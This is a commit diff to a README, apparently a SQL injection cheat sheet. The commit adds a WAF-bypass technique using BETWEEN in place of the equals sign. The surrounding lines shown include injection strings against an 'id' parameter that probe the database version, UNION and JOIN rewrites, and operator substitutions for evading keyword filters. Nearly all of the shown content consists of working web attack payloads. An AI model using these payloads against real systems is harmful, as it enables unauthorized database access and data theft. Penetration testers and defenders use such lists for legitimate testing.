Update README.md
Add WAF bypass using BETWEEN
parent
56ec623412
commit
135af74acd
@ -440,12 +440,13 @@ SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
|
|||||||
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
|
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
|
||||||
```
|
```
|
||||||
|
|
||||||
No Equal - bypass using LIKE/NOT IN/IN
|
No Equal - bypass using LIKE/NOT IN/IN/BETWEEN
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
?id=1 and substring(version(),1,1)like(5)
|
?id=1 and substring(version(),1,1)like(5)
|
||||||
?id=1 and substring(version(),1,1)not in(4,3)
|
?id=1 and substring(version(),1,1)not in(4,3)
|
||||||
?id=1 and substring(version(),1,1)in(4,3)
|
?id=1 and substring(version(),1,1)in(4,3)
|
||||||
|
?id=1 and substring(version(),1,1) between 3 and 4
|
||||||
```
|
```
|
||||||
|
|
||||||
Blacklist using keywords - bypass using uppercase/lowercase
|
Blacklist using keywords - bypass using uppercase/lowercase
|
||||||
@ -461,7 +462,7 @@ Blacklist using keywords case insensitive - bypass using an equivalent operator
|
|||||||
```sql
|
```sql
|
||||||
AND -> &&
|
AND -> &&
|
||||||
OR -> ||
|
OR -> ||
|
||||||
= -> LIKE,REGEXP, not < and not >
|
= -> LIKE,REGEXP, BETWEEN, not < and not >
|
||||||
> X -> not between 0 and X
|
> X -> not between 0 and X
|
||||||
WHERE -> HAVING
|
WHERE -> HAVING
|
||||||
```
|
```
|
||||||
|